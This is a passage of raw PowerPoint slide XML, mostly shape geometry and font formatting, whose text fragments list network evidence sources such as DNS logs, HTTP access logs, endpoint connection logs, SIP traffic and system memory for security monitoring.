            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs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200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535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Types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queries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made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clients</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000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Hosts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using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suspicious </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP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address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ranges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domains</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Statistical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anomalies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289797" y="2177033"/>
            <a:ext cx="5834380" cy="2524125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5834380" h="2524125">
                <a:moveTo>
                  <a:pt x="0" y="420624"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2830" y="371574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11110" y="324185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24524" y="278773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42756" y="235653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65491" y="195141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92413" y="157554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123205" y="123205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157554" y="92413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195141" y="65491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235653" y="42756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278773" y="24524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324185" y="11110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371574" y="2830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420624" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5413248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462297" y="2830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5509686" y="11110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5555098" y="24524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598218" y="42756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638730" y="65491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676317" y="92413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5710666" y="123205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741458" y="157554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5768380" y="195141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5791115" y="235653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809347" y="278773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5822761" y="324185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831041" y="371574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="420624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="2103120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831041" y="2152169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5822761" y="2199558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809347" y="2244970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5791115" y="2288090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5768380" y="2328602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741458" y="2366189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5710666" y="2400538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676317" y="2431330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638730" y="2458252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598218" y="2480987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5555098" y="2499219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5509686" y="2512633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462297" y="2520913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5413248" y="2523744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420624" y="2523744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371574" y="2520913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324185" y="2512633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278773" y="2499219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235653" y="2480987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195141" y="2458252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157554" y="2431330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123205" y="2400538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92413" y="2366189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65491" y="2328602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42756" y="2288090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24524" y="2244970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11110" y="2199558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2830" y="2152169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2103120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420624"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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541766" y="3003702"/>
            <a:ext cx="2749550" cy="791210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7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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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status</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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codes</a:t>
            </a:r>
            <a:endParaRPr sz="22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37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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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headers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721852" y="1656588"/>
            <a:ext cx="5053965" cy="821690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5053965" h="821689">
                <a:moveTo>
                  <a:pt x="4916678" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="136905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93650" y="6983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56071" y="26428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26428" y="56071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6983" y="93650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="136905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="684529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6983" y="727785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26428" y="765364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56071" y="795007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93650" y="814452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136905" y="821435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4916678" y="821435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959933" y="814452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997512" y="795007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5027155" y="765364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046600" y="727785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="684529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="136905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046600" y="93650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5027155" y="56071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997512" y="26428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959933" y="6983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4916678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628758" y="1871599"/>
            <a:ext cx="32410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25">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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dirty="0" sz="2200" spc="-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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs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170938" y="5939790"/>
            <a:ext cx="5834380" cy="2514600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5834380" h="2514600">
                <a:moveTo>
                  <a:pt x="0" y="419100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2818" y="370213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065" y="322985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24426" y="277731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42587" y="234764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65234" y="194399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92053" y="156949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122729" y="122729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156949" y="92053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194399" y="65234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234764" y="42587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277731" y="24426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322985" y="11065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370213" y="2818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414771" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5463658" y="2818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5510886" y="11065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5556140" y="24426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5599107" y="42587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5639472" y="65234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676922" y="92053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711142" y="122729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741818" y="156949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5768637" y="194399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5791284" y="234764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809445" y="277731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5822806" y="322985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831053" y="370213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="419100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833871" y="2095487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831053" y="2144364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5822806" y="2191586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809445" y="2236836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5791284" y="2279802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5768637" y="2320168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741818" y="2357621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5711142" y="2391844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676922" y="2422525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5639472" y="2449349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5599107" y="2472001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5556140" y="2490166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5510886" y="2503530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5463658" y="2511780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414771" y="2514600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="2514600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370213" y="2511780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322985" y="2503530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277731" y="2490166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234764" y="2472001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194399" y="2449349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156949" y="2422525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122729" y="2391844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92053" y="2357621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65234" y="2320168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42587" y="2279802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24426" y="2236836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065" y="2191586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2818" y="2144364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2095487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="419100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422017" y="6570751"/>
            <a:ext cx="3735070" cy="1173480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7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Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>endpoint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connections</a:t>
            </a:r>
            <a:endParaRPr sz="22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37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Type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connection</a:t>
            </a:r>
            <a:endParaRPr sz="22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37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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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headers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506979" y="5038344"/>
            <a:ext cx="5212080" cy="1226820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5212080" h="1226820">
                <a:moveTo>
                  <a:pt x="5007610" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="204469" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157594" y="5401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114559" y="20786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76593" y="44926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44926" y="76593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20786" y="114559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5401" y="157594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1022349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5401" y="1069225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20786" y="1112260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44926" y="1150226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76593" y="1181893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114559" y="1206033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157594" y="1221418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204469" y="1226819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5007610" y="1226819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5054485" y="1221418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5097520" y="1206033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5135486" y="1181893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5167153" y="1150226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5191293" y="1112260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5206678" y="1069225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5212080" y="1022349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5212080" y="204469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5206678" y="157594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5191293" y="114559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5167153" y="76593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5135486" y="44926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5097520" y="20786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5054485" y="5401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5007610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771394" y="5217566"/>
            <a:ext cx="4681855" cy="7912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45134" marR="5080" indent="-433070">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>VoIP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>managers</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Initiation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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14">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(SIP)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>traffic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297418" y="5939790"/>
            <a:ext cx="5826760" cy="2514600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5826759" h="2514600">
                <a:moveTo>
                  <a:pt x="0" y="419100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2818" y="370213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065" y="322985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24426" y="277731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42587" y="234764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65234" y="194399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92053" y="156949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122729" y="122729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156949" y="92053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194399" y="65234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234764" y="42587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277731" y="24426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322985" y="11065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370213" y="2818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5407151" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5456015" y="2818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503226" y="11065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5548469" y="24426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5591431" y="42587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5631796" y="65234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669248" y="92053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703474" y="122729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734158" y="156949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5760986" y="194399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783642" y="234764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5801811" y="277731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5815179" y="322985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5823431" y="370213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826251" y="419100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5826251" y="2095487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5823431" y="2144364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5815179" y="2191586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5801811" y="2236836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783642" y="2279802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5760986" y="2320168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734158" y="2357621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5703474" y="2391844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669248" y="2422525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5631796" y="2449349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5591431" y="2472001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5548469" y="2490166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503226" y="2503530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5456015" y="2511780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5407151" y="2514600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419100" y="2514600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370213" y="2511780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322985" y="2503530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277731" y="2490166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234764" y="2472001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194399" y="2449349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156949" y="2422525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122729" y="2391844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92053" y="2357621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65234" y="2320168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42587" y="2279802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24426" y="2236836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065" y="2191586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2818" y="2144364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2095487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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8550020" y="7001382"/>
            <a:ext cx="386016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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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system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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>memory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730995" y="5257800"/>
            <a:ext cx="4852670" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4852669" h="984885">
                <a:moveTo>
                  <a:pt x="4688332" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
